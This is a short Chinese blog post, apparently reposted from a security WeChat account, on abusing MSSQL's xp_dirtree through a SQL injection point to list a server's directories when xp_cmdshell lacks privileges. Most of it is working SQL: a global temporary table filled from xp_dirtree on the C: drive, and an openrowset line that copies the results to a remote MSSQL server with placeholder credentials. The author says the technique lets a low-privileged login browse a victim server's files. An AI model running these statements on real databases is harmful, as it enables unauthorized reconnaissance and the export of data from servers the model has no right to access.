朋友给我一个注入点,开启了xp_cmdshell、xp_dirtree,因为权限不够,执行命令都是失败了,我只是整理下了xp_dirtree利用方式的四句话!
-建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表
create table ##nonamed(dir ntext,num int)
-调用存储过程把执行回来的数据存到临时表里面
insert ##nonamed execute master..xp_dirtree 'c:',1
--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了
可不需要:insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
select * from ##nonamed
以上方法,也就是说public可以遍历用户服务器的目录 具体有什么利用价值嘛~呵呵见仁见智了
本文始发于微信公众号(LemonSec):xp_dirtree利用方法
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论